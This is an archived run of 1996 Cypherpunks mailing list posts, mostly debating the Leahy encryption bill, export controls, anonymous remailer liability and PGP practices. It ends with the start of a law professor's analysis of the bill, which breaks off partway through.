Sticking your head in the sand isn't a good tactic at this point. 


> Let's be
>honest with ourselves here, this is Congress we're talking about and
>this is a pretty bold step.  We need to educate them to see the facts
>we understand so thoroughly:

"What's wrong with this picture"?  

If this is "a pretty bold step," then my question is, who "on our side" did 
they consult before they wrote this law?  If, as you state, "we need to 
educate them..." then the implication is that this bill simply popped out 
without any apparent "ordinary-crypto-user/small-crypto writer-seller" 
input, right?  In that case, we should ask "how [arguably] did they get what 
we wanted as well as they did?"   

On the other hand, if they DID get consultation from a number of "our" 
organizations, why didn't they fix the remaining problems?  


Here's a totally unsupported hypothesis for your consideration:  I speculate 
that they DID get some input from "our" side, via some confidential 
arrangement, by some of those same organizations that were falling all over 
themselves to praise most of the bill.  In other words, those organizations 
were subtly co-opted, although not nearly completely of course.  However, those 
organizations then felt like they had a "hand into" the structuring of this 
bill, and you know how blind to faults a proud parent can be!

Am I getting close to the truth here, Mr. Safdar?  Tell me, Mr. Safdar, did 
you consult a lawyer before you endorsed this bill?  Please share with us 
whatever legal opinions you received which induced you to speak positively 
about this bill.

> that crypto export controls do not work,
>endanger our own requirements for confidentiality, and aren't helping
>contain this technology in the rest of the world.

Then let's take the position that this law CAN be changed!  In fact, let's 
insist on it.

>Forcing Congress to have this debate will lay bare these facts and
>hopefully embarass the Administration for their absurd policy
>approach on encryption.

With that limited statement I totally agree.

>They say that liberty is seldom lost all at once, but a little at a time. 
>Regaining it is probably done this way as well.  In this case, the
>Leahy bill gives us back a mouthful.

And the "mouthful" contains enough poison to kill our freedoms.  
Fortunately, the poison is easily identifiable, and is all in one spot, and 
should be removeable if we see it in time.

So why are these people trying to shove it down our throats?

Jim Bell

jimbell@pacifier.com





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Mike Tighe <tighe@spectrum.titan.com>
Date: Mon, 11 Mar 1996 23:49:54 +0800
To: EALLENSMITH@ocelot.Rutgers.EDU (E. ALLEN SMITH)
Subject: Re: Cryptanalysis
In-Reply-To: <01I25ASYNMT6AKTUGH@mbcl.rutgers.edu>
Message-ID: <199603111510.JAA18870@softserv.tcst.com>
MIME-Version: 1.0
Content-Type: text/plain



>There are very good reasons to say little about "conventional
>cryptanalysis": it just doesn't matter much with modern ciphers, such as
>public key systems. Modern ciphers don't fall to conventional attacks based
>on word frequency, pattern analysis, etc.

I disagree with this, and think that in the next 10-25 years we will find
that most of the systems we are using today were as easily broken as the
systems of yester-year (Enigma, Japanese Codes ,etc).




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: anonymous-remailer@shell.portal.com
Date: Tue, 12 Mar 1996 04:47:05 +0800
To: cypherpunks@toad.com
Subject: Cryptographers against cryptography
Message-ID: <199603111735.JAA17685@jobe.shell.portal.com>
MIME-Version: 1.0
Content-Type: text/plain


This is the second in a regular series of postings to expose
cryptographers and cypherpunks who are either lying to us or
making a very serious mistake in there judgement.

Why do I say this?? What do these people have in common? Easy. Even though
they act like they are on the side of crypto for the masses, every
one of them support the Leahy anticryptography bill. This law will
make it illegal to run an encrypting remailer and will require
key escrow. If it isn't clear why this is the case READ THE BILL!!!!
Several wise people on the CypherPunkS mailing list, cypherpunks@toad.com
have exposed the bill for what it is. Even though these people have been
presented with evidence that the bill does these things they have
not recanted. They stab us in the back and then they lie about it.

Some of these people have been bought out by forces unknown. Others are just
blind to the facts and need education. Bizdos is in a class by himself.

It's time we "help" them think about this. Email each of these
people with youre opinion that they should support cryptography or
maybe stop lying to us that they do. What you say and do is up to
you. I do not support breaking the law (yet).

B. Schneier: bs208@newton.cam.ac.uk, schneier@counterpane.com
M. Blaze: mab@crypto.com, mab@research.att.com
J. Bizdos: jim@rsa.com
S. Safaddar: shabbir@vtw.org
D. Weinstein: djw@vplus.com
P.. Peterson: padgett@hobbes.orl.mmc.com
B. Stewart: stewarts@ix.netcom.com

BOYCOTT APPLIED CRYPTOGRAPHY, AT&T, VTW, and RSA!!!!






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Adam Shostack <adam@lighthouse.homeport.org>
Date: Mon, 11 Mar 1996 23:25:54 +0800
To: savron@world-net.sct.fr
Subject: Re: PGP reveals  the key ID of the recipient of encrypted msg
In-Reply-To: <199603110740.IAA06254@storm.certix.fr>
Message-ID: <199603111505.KAA02090@homeport.org>
MIME-Version: 1.0
Content-Type: text


savron@world-net.sct.fr wrote:

| The problem is carried along when you encrypt a message for multiple  
| recipients , you get the key IDs of all the recipients and same 
| problem as above .  I think something like 'blind email copy' should 
| be used , because the recipients don't have to know the identity of 
| each other .
| 
| Comments from long time PGPer  will be welcome

	If someone is concerned about this, they can create a new
anonymous key, and use that for their correspondance.  They can sign &
encrypt it to the correspondants they want to use that key.  Keys are
cheap.  Everyone should have a bunch.

Adam

-- 
"It is seldom that liberty of any kind is lost all at once."
					               -Hume





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "A. Padgett Peterson P.E. Information Security" <PADGETT@hobbes.orl.mmc.com>
Date: Mon, 11 Mar 1996 23:48:04 +0800
To: cypherpunks@toad.com
Subject: re: Video resolution
Message-ID: <960311101404.2020a2ad@hobbes.orl.mmc.com>
MIME-Version: 1.0
Content-Type: text/plain


Note: this refers to the IBM PC & clones only

> The point is that they do a lousy job on dithering.  So does Microsoft
> explorer.  They probably purchased the identical code from some clot.

Have been watching this go back and forth & get further from the original
question as usual. I suspect that if the original poster looks in her/his/
its/other SYSTEM.INI file, the line "display.drv=vga.drv" will be found in
the [boot] section. This is the default 16 color driver installed by 
Windows to be compatible with every 256k 640x480 VGA card.

This makes a decent GIF or JPEG  - even "64 gray scale" such as the
QuickCam produces - look like olifactory solid waste products.

To do better, you need three things:
1) A video card with higher resolution (usually at least 1 Mb of video 
   memory is necessary).
2) A video monitor capable of supporting the card's output.
3) An increased resolution (at least 256 colors as the first responder
   mentioned) video driver to replace vga.drv (YMMV).

If any of these are missing, see the second paragraph above.

					Warmly,
						Padgett

ps the CDA does nothing to block really creative insults 8*).




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Dinesh Nair <dinesh@alphaque.com>
Date: Mon, 11 Mar 1996 10:54:45 +0800
To: cypherpunks@toad.com
Subject: Re: Someone in a goverment with something close to the right idea...
In-Reply-To: <01I2565G8OEEAKTUFI@mbcl.rutgers.edu>
Message-ID: <Pine.SOL.3.91.960311102536.25001G-100000@rnd_1>
MIME-Version: 1.0
Content-Type: text/plain




On Sat, 9 Mar 1996, E. ALLEN SMITH wrote:

> 	Well, he at least has part of the right idea.
> 	-Allen
> 
>    Reuters New Media
>    KUALA LUMPUR, Malaysia - Censoring Internet access will not solve
>    concerns over privacy and individual freedom in cyberspace, Malaysia's
>    Deputy Prime Minister Anwar Ibrahim said.

He's got good ppl advicing him. Basically, these guys even surprised me, 
being in malaysia and all that. but his stand on the matter as well as 
the PM's is pretty good on this. now, the information minister is a 
different kettle of fish altogether, but he'll seccede to the PM's wishes 
anyway.

Regards,                           /\_/\   "All dogs go to heaven."
dinesh@alphaque.com                (0 0)
+==========================----oOO--(_)--OOo----============================+
| for a in past present future; do                                          |
|   for b in clients employers associates relatives neighbours pets; do     |
|   echo "The opinions here in no way reflect the opinions of my $a $b."    |
| done; done                                                                |
+===========================================================================+
   http://pgp.ai.mit.edu/htbin/pks-extract-key.pl?op=get&search=0x230096E9





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: John Young <jya@pipeline.com>
Date: Tue, 12 Mar 1996 00:10:51 +0800
To: cypherpunks@toad.com
Subject: TWP on Crypto Keys
Message-ID: <199603111541.KAA12090@pipe1.nyc.pipeline.com>
MIME-Version: 1.0
Content-Type: text/plain


   The Washington Post, March 11, 1996, p. A18.


   Security and Software [Editorial]


   The number of computer users continues to grow, but use of
   the Internet for business and financial transactions isn't
   keeping pace. At least, that's the complaint of many who
   expected a flood of Americans to go on-line for banking,
   publishing and mail-ordering -- with tremendous profits to
   the on-line industries that handle these services. One big
   reason for the lag is customer concern about the safety of
   information, from credit-card numbers to bank balances and
   business secrets, in the hacker-rich environment of the
   Internet -- an eminently reasonable concern that many in
   the industry believe can be addressed only by the wider use
   and availability of sophisticated "encryption software,"
   which scrambles information en route, making it
   indecipherable to anyone who doesn't hold the key to the
   code.

   The sense that encryption technology holds the key to
   future economic growth on the Internet is pushing an arcane
   but intense argument between the Clinton administration and
   the computer industry over whether to lift existing
   restrictions on the export of the most powerful encryption
   software. The administration, especially its law
   enforcement agencies, bars on national security grounds the
   export of encryption software above a certain difficulty
   level, saying that it needs to be able, if neqessary, to
   seek and obtain the equivalent of a permit to wiretap. The
   makers of the software argue that these restrictions are
   ruinous for U.S. competitiveness in the international
   market because foreign customers want the most secure
   encryption available. Some civil liberties organizations
   argue that the restrictions are an invasion of customers'
   privacy rights.

   Legislation introduced this month in both the House and the
   Senate would ease the export restrictions while attempting
   to meet some of the government's security concerns. Code
   makers would deposit a "spare key" to any exported
   encryption software with a trusted third-party agency -- a
   compromise the Justice Department and national security
   agencies also have been pursuing in talks with the
   industry, but at which the industry hesitates because it
   fears that the existence of "spare keys lying around" would
   cause potential customers to balk. (The Justice Department
   also would like a spare-key agreement for encryption
   software sold domestically, but has less leverage because
   such sales require no license.)

   The legislation would heavily penalize any "key holder"
   agency that provides an unauthorized copy to anyone besides
   the government. But it also would make it legal to export
   any encryption technology that is already "generally
   available" -- for instance, in stores or on domestic
   computer bulletin boards.

   Such a sweeping change, law enforcement authorities fear,
   could render the other barriers and safeguards in the bill
   close to academic in the borderless, lightning-quick world
   of Internet transmission. Once it's widely available
   overseas, "uncrackable" software or hardware can't be
   recalled. The U.S. intelligence agencies with their
   superior computing power can still crack most coded
   software, if not immediately, then much faster than 99.9
   percent of ordinary commercial hackers. But that doesn't
   mean their concerns should be shrugged off. Like arms
   sales, encryption technology sales have implications for
   traditional national security interests as well as the
   economic kind. The urgent interest both sides share is to
   get this resolved soon.

   [End]






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Phillip M. Hallam-Baker" <hallam@w3.org>
Date: Tue, 12 Mar 1996 00:16:50 +0800
To: cypherpunks@toad.com
Subject: Re: Vexatious Litigants  (was: SurfWatch)
Message-ID: <199603111547.KAA14991@bb.hks.net>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

E. ALLEN SMITH wrote:
> 
> From:   IN%"stewarts@ix.netcom.com"  "Bill Stewart" 10-MAR-1996 04:29:37.67
> 
> >Presumably, almost nobody in Europe is going to add these silly Yankee
> >rating labels to their web pages, except a few commercial content providers
> >who want to sell advertising or services into markets that block
> >un-rated web pages.  So schoolkids behind rating-mandatory sites
> >will have to ask their teachers why the "World-Wide-Web" is just American ---
> >"It's got All 50 States, Johnny!"   <Exonive deleted>!
> 
>         The WWW consortium is approaching European governments about their
> rating system - the one found at SafeSurf.
>         -Allen

Disclaimer: I don't work on PICS and I don't speak for the consortium.

Actually the European govts are far more likely to see labels being
used. In the US a piece of crackpot legislaion has been passed which
has some clearly unconstitutional parts. The ban on abortion related 
speach for example which the justice dept isn't going to defend in
any way. I expect that the Exon amendment will eventually be ruled
unconstitutional through being overbroad. The problem is that it is
difficult to get people to do something voluntarily after ordering them
to do so and being overuled by the courts.

This is the kind of small minded, foot stomping politics that the
US congress is famous for worldwide. 


In Europe the governments tend to be more aware of their impotence. There
is also much less hysteria about kids seing pornography, the main concern
is violence and in particular amoral US TV shows for kids, the sort where
people beat each other up but nobody ever gets hurt. In France one can
buy hard core porn in the supermarket. The govt. is far more concerned 
about foreign language material.


The whole point about PICs is that it is not bound to a single rating
scheme. I had a go at producing a spec for a rating scheme back in '94 
but gave up since life is too short to waste. The Web is decentralised
and anyone can set up shop in it. Now we have a scheme in which anyone 
can set up a rating scheme.

So we will have the kook brigade filtering out material on evolution
and the concerned parents preventing their five year olds from viewing
the alt.tv.very.scary gifs. Actually this is the main point of the 
exercise. I can't think of any system which is going to defeat determined
14+ kids from finding porn but its a bit easier to stop the 7 and unders
from accidentially seeing stuff that will give them nightmares.


		Phill
- ---
[This message has been signed by an auto-signing service.  A valid signature
means only that it has been received at the address corresponding to the
signature and forwarded.]

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2
Comment: Gratis auto-signing service

iQBFAwUBMURLKSoZzwIn1bdtAQGeWgGA0n4wmvgI8F4UspSxmWJ3Q9C2+LaxVPl7
xy+H0/0QN66VneWZg+h+pNZd3kmLdgOj
=+z3H
-----END PGP SIGNATURE-----




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Anonymous User <nobody@c2.org>
Date: Tue, 12 Mar 1996 12:54:21 +0800
To: cypherpunks@toad.com
Subject: noise levels
Message-ID: <199603111905.LAA08069@infinity.c2.org>
MIME-Version: 1.0
Content-Type: text/plain


"Perry E. Metzger" <perry@piermont.com> wrote:

> Noise levels have been rising fast again. I encourage people to think
> about whether things are on topic before they post.
> 
> Perry
> 
> 

This message is generated as part of an ongoing effort to keep noise off
of the Cypherpunks mailing list (cypherpunks@toad.com)

Your message contains no cryptography content.  Please do not post messages
of this sort to the Cypherpunks mailiing list in the future.

Thank you for your cooperation; it will ensure that further action will not
be necessary.

--
USENET POLICE DEPARTMENT

"To serve and obey, and guard men from harm"




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Anonymous User <nobody@c2.org>
Date: Tue, 12 Mar 1996 07:45:49 +0800
To: cypherpunks@toad.com
Subject: noise levels
Message-ID: <199603111905.LAA08099@infinity.c2.org>
MIME-Version: 1.0
Content-Type: text/plain


"Perry E. Metzger" <perry@piermont.com> wrote:

> Noise levels have been rising fast again. I encourage people to think
> about whether things are on topic before they post.
> 
> Perry
> 
> 

This message is generated as part of an ongoing effort to keep noise off
of the Cypherpunks mailing list (cypherpunks@toad.com)

Your message contains no cryptography content.  Please do not post messages
of this sort to the Cypherpunks mailiing list in the future.

Thank you for your cooperation; it will ensure that further action will not
be necessary.

--
USENET POLICE DEPARTMENT

"To serve and obey, and guard men from harm"




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: jim bell <jimbell@pacifier.com>
Date: Tue, 12 Mar 1996 13:18:33 +0800
To: Ed Carp <wb8foz@nrk.com>
Subject: Re: How would Leahy bill affect crypto over HAM radio?
Message-ID: <m0twCzp-0008yoC@pacifier.com>
MIME-Version: 1.0
Content-Type: text/plain


At 08:36 PM 3/10/96 +0000, Ed Carp wrote:
>On Sun, 10 Mar 1996, David Lesher wrote:
>
>> > 
>> > Subject asks it. I'm not a HAM, but still curious. Wonder if anyone
>> > has brought this to Leahy's attention...
>> > 
>> > Comments from the packet folx on the list?
>> 
>> Non-cleartext has been forbidden for last 60 years anyhow.
>
>Not quite.  Anything intended to hide the meaning of the message is 
>banned.  Compression isn't banned, because the intention is to make more 
>efficient use of the frequency, not to hide the meaning.
>--
>Ed Carp, N7EKG    		


Even so, it isn't clear that this new law WON'T change the rules under which 
hams operate.  An affirmative statement of the right to use encryption would 
seem to pre-empt prior bans, except if there was some sort of explicit 
exception for over-the-air transmissions.  After all, the law was written 
broadly, and presumably is to be interpreted broadly.  It if doesn't list or 
single out any particular medium (text on paper; Internet; modem/telephone; 
etc) then it may reasonably be assumed to apply to all media.

Not that such an interpretation will necessarily be welcomed by some hams:  
Part of the reason for maintaining the ban on encryption would be the fear by 
hams that ham bandwidth will be surreptiously used by commercial services 
masquerading as ham users.  Encryption would make such usage difficult to 
detect.

However, I happen to believe that hams should be entitled to use good 
encryption, for voice and data communication.

Jim Bell, N7IJS


jimbell@pacifier.com

  





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Gary Howland <gary@kampai.euronet.nl>
Date: Tue, 12 Mar 1996 04:19:21 +0800
To: rickt@psisa.com
Subject: Re: (Fwd) Gov't run anon servers
Message-ID: <199603111015.LAA10327@kampai.euronet.nl>
MIME-Version: 1.0
Content-Type: text/plain


> Right. Couldn't you insert some kind of var into the kernel, rebuild and
> upon each reboot have the remailer process (which would have to be root
> owned) check for the value of this? I am of course assuming that the owner
> of the remailer has admin control over the box, which is kind of unscalable.
> If someone does gain entry to the machine, he'd need root to skim through
> the kernel memory, and since he wouldn't have access to the remailer src
> (you don't have it online, right?) he'd have a hard time looking for what he
> needed...

I was thinking of something much simpler,
eg.:

	% remailer
	Enter passphrase: xxx
	Remailer started ...
	%

This of course assumes that the remailer runs as a process - if it doesn't
then there is no reason a 'remailer helper' cannot.

The only disadvantage of this is that the remailer cannot be rebooted
without a passphrase being entered, but then there are ways around this
(entering the passphrase remotely over a secure link etc., or more
sophisticated 'remote authorisation' systems).

The advantage of this is that the password is never on the disk,
only in memory (which will take serious (read "expensive") to extract).

I am amazed at all of the talk of smart cards etc., when all that is
really needed is a password entered at boot time.

Gary
--
pub  1024/C001D00D 1996/01/22  Gary Howland <gary@kampai.euronet.nl>
Key fingerprint =  0C FB 60 61 4D 3B 24 7D  1C 89 1D BE 1F EE 09 06 




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: frantz@netcom.com (Bill Frantz)
Date: Tue, 12 Mar 1996 12:07:39 +0800
To: cypherpunks@toad.com
Subject: Re: Cryptographers against cryptography
Message-ID: <199603111915.LAA05627@netcom7.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain


At  9:35 AM 3/11/96 -0800, anonymous-remailer@shell.portal.com wrote:
>BOYCOTT APPLIED CRYPTOGRAPHY, AT&T, VTW, and RSA!!!!

And become a Know Nothing.


------------------------------------------------------------------------
Bill Frantz       | The CDA means  | Periwinkle  --  Computer Consulting
(408)356-8506     | lost jobs and  | 16345 Englewood Ave.
frantz@netcom.com | dead teenagers | Los Gatos, CA 95032, USA






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "A. Padgett Peterson P.E. Information Security" <PADGETT@hobbes.orl.mmc.com>
Date: Tue, 12 Mar 1996 00:38:32 +0800
To: cypherpunks@toad.com
Subject: Leahy and Mrs. Bemmis (now that's a subject line)
Message-ID: <960311112406.2020a2ad@hobbes.orl.mmc.com>
MIME-Version: 1.0
Content-Type: text/plain


First, would like to comment that some people do not like some of my
beliefs. Tough. Do try to be honest and consistant about them. One of
them is that while the US is imperfect, it is better than anything else
I have seen (and have seen more than a few) and has the potential to remain 
great. 

Do believe in the "sovereign right of nations" to be a fact. Also believe
in human rights personally but do not expect governments to agree merely
because I say so.

Some favor direct action. I prefer the "theater of the absurd" & have found 
that most people are able to recognize absurdity when they see it, 
particularly if carried to extreems. Most of life is absurd to those who
are able to really enjoy it.

The Leahy bill is flawed in two areas. Sent a message with proposed wording
to Sen. Leahy via his web page but have not gotten a response. Have a bad
habit of reading laws without thought since this is how LEA and prosecutors
are told to enforce them - as written, not as believed. If an area is
vague, a court is required to decide how to interpret it, not LEA. If badly
written *everyone* loses.

At the same time am pragmatic enough to accept the idea that it will have
no effect unless it passes and to be passed today it must have something
like the criminalization statement. The goal here should not be to throw
it out since that would simply cause the whole bill to fail, but to word
it carefully enough that it satisfies those who reguire laws while being
narrow enough to avoid exploitation. IMNSHO the best way to do that is to
require that: 
1) A felony occured (curiously misdemeanors were ommitted) 
   and
2) That the individual to be charged was an active participant (before,
        during, or after the fact) 
   and
3) That encryption was used in furtherance.

Note: that in the US (1) and (2) seem sufficient for a criminal charge to be 
brought, so does (3) really add anything except words or possibly severity ?

Seizure seems to be a great concern of the group with the point of the
Bemmis Pontiac being brought up. For someone providing a free remailer,
that is a valid concern since the first question a court might ask is
"what was the motivation". I suspect that someone providing a remailer
and charging a reasonable fee to all who might want to use the service
might be in a much better position (not a lawyer so not allowed to know). 

One indicator might be easy to check: Has there ever been a seizure 
involving a rental car (Hertz, Avis, etc.) and if so, what was the 
disposition ?
						Warmly,
							Padgett




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: tcmay@got.net (Timothy C. May)
Date: Tue, 12 Mar 1996 05:13:18 +0800
To: cypherpunks@toad.com
Subject: Leahy Bill a Move to Slow Crypto Exports as Much as Possible
Message-ID: <ad69aaf6180210046dc1@[205.199.118.202]>
MIME-Version: 1.0
Content-Type: text/plain


At 11:02 AM 3/11/96, Mutant Rob wrote:
>Timothy C. May wrote:
>> I think this is showing that one of the intended purposes of the Leahy bill
>> is to slow down exports of crypto for as long as possible, and then only to
>> grant export licenses when competition from abroad threatens to undo the
>> effects of the stalling process anyway.
>
>Hmmm.
>
>But what about the case of PGP? It's a relatively strong product, and
>an international version exists.  I'd guess that PGP 3.0 may implement
>other algorithms (PK and symmetric), and likely an international PGP3
>would follow... so how could the Commerce Dept rationalize not giving
>an export license to ViaCrypt?
>
>And would a similar, but non-compatible, utility that used RSA and/or
>IDEA, 3DES, etc. also be exportable? ...

Oh, I think they probably will (assuming the ViaCrypt and/or PGP products
are unencumbered with respect to patent issues).

I was more thinking about "novel" applications: things related to digital
cash, remailers, information markets, etc. These are things which are at a
nascent stage, and nearly any of them can stalled for export by citing the
absence of comparable competitors in Europe and Asia.

Hence my concern that the clause is effectively an excuse for delaying
crypto for as long as is practically possible. Not much of an improvement
over what we have now--though established companies will no doubt be happy
because they can export their fairly boring apps--and the new
criminalization of crypto (when connected with any of the other thousands
of felony-class crimes, such as swearing) is a step backward.

--Tim May

Boycott "Big Brother Inside" software!
We got computers, we're tapping phone lines, we know that that ain't allowed.
---------:---------:---------:---------:---------:---------:---------:----
Timothy C. May              | Crypto Anarchy: encryption, digital money,
tcmay@got.net  408-728-0152 | anonymous networks, digital pseudonyms, zero
W.A.S.T.E.: Corralitos, CA  | knowledge, reputations, information markets,
Higher Power: 2^756839 - 1  | black markets, collapse of governments.
"National borders aren't even speed bumps on the information superhighway."








From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: tcmay@got.net (Timothy C. May)
Date: Tue, 12 Mar 1996 05:51:03 +0800
To: cypherpunks@toad.com
Subject: Re: noise levels
Message-ID: <ad69acd619021004de89@[205.199.118.202]>
MIME-Version: 1.0
Content-Type: text/plain


At 4:55 PM 3/11/96, Perry E. Metzger wrote:
>Noise levels have been rising fast again. I encourage people to think
>about whether things are on topic before they post.
>

I again encourage Perry to consider learning how to use filters.

While I happen to be uninterested in many of the topics being discussed, I
realize that one man's noise is another man's signal.

Besides, the C coders and crypto mavens created their own protected list,
the Coderpunks list, and this is where Perry and others can presumably find
the high S/N discussion of Java, Diffie-Hellman, applets, DES, and memory
leaks that he so craves.

--Tim May


Boycott "Big Brother Inside" software!
We got computers, we're tapping phone lines, we know that that ain't allowed.
---------:---------:---------:---------:---------:---------:---------:----
Timothy C. May              | Crypto Anarchy: encryption, digital money,
tcmay@got.net  408-728-0152 | anonymous networks, digital pseudonyms, zero
W.A.S.T.E.: Corralitos, CA  | knowledge, reputations, information markets,
Higher Power: 2^756839 - 1  | black markets, collapse of governments.
"National borders aren't even speed bumps on the information superhighway."








From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Dan Harmon <harmon@tenet.edu>
Date: Tue, 12 Mar 1996 05:13:07 +0800
To: cypherpunks@toad.com
Subject: spy sats
Message-ID: <Pine.OSF.3.91.960311114101.21213A-100000@gaston.tenet.edu>
MIME-Version: 1.0
Content-Type: text/plain



Tonight on the Discovery Channel at 10 eastern is a program about
spy satellites.

Dan




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Perry E. Metzger" <perry@piermont.com>
Date: Tue, 12 Mar 1996 01:21:50 +0800
To: cypherpunks@toad.com
Subject: noise levels
Message-ID: <199603111655.LAA00604@jekyll.piermont.com>
MIME-Version: 1.0
Content-Type: text/plain



Noise levels have been rising fast again. I encourage people to think
about whether things are on topic before they post.

Perry




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: tcmay@got.net (Timothy C. May)
Date: Tue, 12 Mar 1996 12:17:10 +0800
To: cypherpunks@toad.com
Subject: Re: Leahy bill nightmare scenario?
Message-ID: <ad69aec21a02100451f8@[205.199.118.202]>
MIME-Version: 1.0
Content-Type: text/plain


At 11:12 AM 3/11/96, Gary Howland wrote:

>Dan Weinstein writes:

>> If I rent cars, someone might one day use a car rented from me in a
>> robbery.  Does that make my an accessary?  NO.
>
>This is an unfair analogy.  Now if you had said that you rented cars
>without asking for proof of identification, thus making your car hire
>centre very useful to robbers, that may more closely resemble the
>anon-remailer situation.

If a hotel rents a room to someone who commits a crime in that room, e.g.,
prostitution, drug use, plotting to blow up a building, can the hotel be
seized under the asset forfeiture laws?

Not that I have heard.

Does it matter if the hotel fails to extensively check identification?
(Hint: Rarely have I had my ID checked. Sometimes they ask for a driver's
license and write down the number...and we all know how easy it is to get
fake DLs. Mostly they don't.)

If I lend my chain saw to my next-door neighbor without confirming his
identity, and he carves up his wife, am I liable? Not in these parts.

(If I lend my chain saw to a ranting, foaming maniac, am I liable? Perhaps.)

If I let someone use my telephone without confirming his identity, am I
liable for crimes committed with this phone?

This last example is, I submit,  a nearly perfect parallel to anonymous
remailers. And not because the telephone system is a "common carrier," but
because of scienter: I have no knowledge, and cannot be expected to have
knowledge, of crimes committed with my phone.

If I have visitors at my house, perhaps at a party, and I let a stranger go
ahead and make a call from the phone in a bedroom, for example, and he
plans a drug deal, can my house be automatically seized? Not that I have
ever heard about. Maybe so, but if this ever happens, expect an outcry
against the asset forfeiture laws that will make Linda Thompson's protest
seem tame.

Now if I operate a pay phone and encourage dealers and pimps to use it,
then maybe the public nuisance, RICO, or "crack house" laws can be used to
shut it down. (The public nuisance laws are what I would look to to see
remailers shut down, which will just move them offshore, of course. Absent
laws about sending encrypted packets outside the country, nothing can be
done.)

And, finally, packages and letters may be mailed anonymously. This is what
pre-paid stamps are all about. And I've used non-U.S. Postal Service
package delivery sytems without providing identification. Can Federal
Express have their assets seized because of "anonymous remailing"?
(Quibblers will no doubt cite laws requiring FedEx to "cooperate," demand
ID, etc.)

--Tim May

Boycott "Big Brother Inside" software!
We got computers, we're tapping phone lines, we know that that ain't allowed.
---------:---------:---------:---------:---------:---------:---------:----
Timothy C. May              | Crypto Anarchy: encryption, digital money,
tcmay@got.net  408-728-0152 | anonymous networks, digital pseudonyms, zero
W.A.S.T.E.: Corralitos, CA  | knowledge, reputations, information markets,
Higher Power: 2^756839 - 1  | black markets, collapse of governments.
"National borders aren't even speed bumps on the information superhighway."








From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Peter D. Junger" <junger@pdj2-ra.F-REMOTE.CWRU.Edu>
Date: Tue, 12 Mar 1996 05:13:15 +0800
To: Cypherpunks <cypherpunks@toad.com>
Subject: A lengthy preliminary analysis of the Leahy bill.
Message-ID: <m0twBMF-0004L1C@pdj2-ra.F-REMOTE.CWRU.Edu>
MIME-Version: 1.0
Content-Type: text/plain



This is a preliminary draft of my preliminary analysis of the Leahy
bill.  In it I am primarily concerned with the affect---if any---of
that bill on the constitutionally protected freedoms of speech and of
the press.

At times in this submission I may seem overly suspicious of some
agencies of the government.  That may be a consequence of this being
merely a preliminary draft; it is more likely, however, that it is the
result of years of studying the ITAR and the antics of the agents in
the Office of Defense Trade Controls and the NSA as they relate to the
licensing requirements for cryptographic software.

Permission is granted to post this submission to other mailing lists
and news groups, but only if it is posted in its entirety (except for
headers other than the ``To'', ``From'', and ``Subject'' lines).

     -------------------------------------------------

The Leahy Bill known as the Encrypted Communications Privacy Act is
certainly well intentioned and Senator Leahy and the other sponsors
(Senators Burns, Dole, Murray, and  Pressler) should be congratulated
for their efforts.  

Those whose major goal is to be able to export mass-marketed
cryptography have good reason to support this bill, even though it has
features---and ambiguities---that they may find undesireable, and even
though the bill may not actually make all mass marketed cryptographic
hardware and software freely exportable.  (There is even the danger
that it might even be interpreted (for reasons that I will explain
hereafter) as not making any change in the requirements for the export
of cryptographic software, whether mass marketed or not).

On the other hand, those like Daniel Bernstein and myself, who want to
publish information---including algorithms and source code---that is
subject to the licensing requirements of the International Traffic in
Arms Regulations (``ITAR'') that apply to cryptographic devices and
software---at least according to the National Security Agency's
representatives and that agency's puppets in the Office of Defense
Trade Controls---may find the bill more of a hindrance than a help in
their efforts to assert the constitutional right of freedom of speech
and of the press.

My concern is not that the bill will somehow lead to mandatory key
escrow.  My concern is that in relaxing the restrictions on the export
of software as a commodity it may actually give support to the efforts
of the censors to keep Daniel Bernstein from publishing his article
about his algorithm for converting a hash function into a
cryptographic program---I hope that is a fair enough description of
his article, an article that the censors have prevented me from ever
seeing---and those censor's efforts to keep me from publishing my
materials---which contain some cryptographic software---for my course
in computers and the law, and to keep foreign students from taking that
course.  

The major threat is that, for the first time, there would be
at least colorable Congressional authority for the requirement that
one obtain a license before publishing or otherwise disclosing
information.  And software is, after all, nothing but information.

Let me go through the bill and attempt to explain my concerns. (I hope
that the version of the bill that I am using is correct.)


   A BILL

   To affirm the rights of Americans to use and sell encryption products,
   to establish privacy standards for voluntary escrowed encryption
   systems, and for other purposes.

   Be it enacted by the Senate and House of Representatives of the United
   States of America in Congress assembled,

   SECTION 1. SHORT TITLE.

   This Act may be cited as the "Encrypted Communications Privacy Act of
   1996".

   SEC. 2. PURPOSE.

   It is the purpose of this Act-
   (1) to ensure that Americans are able to have the maximum possible
   choice in encryption methods to protect the security, confidentiality,
   and privacy of their lawful wire or electronic communications; and
   (2) to establish privacy standards for key holders who are voluntarily
   entrusted with the means to decrypt such communications, and
   procedures by which investigative or law enforcement officers may
   obtain assistance in decrypting such communications.


I have no objections to the provisions of this section---except
possibly for the reference to procedures by which officers may obtain
assistance in decrypting communications.  But I am not happy that the
purpose does not include protecting the freedoms of speech and of the
press, and particularly the freedom to communicate information about
cryptography.


   SEC. 3. FINDINGS.

     The Congress finds that-
     (1) the digitization of information and the explosion in the growth
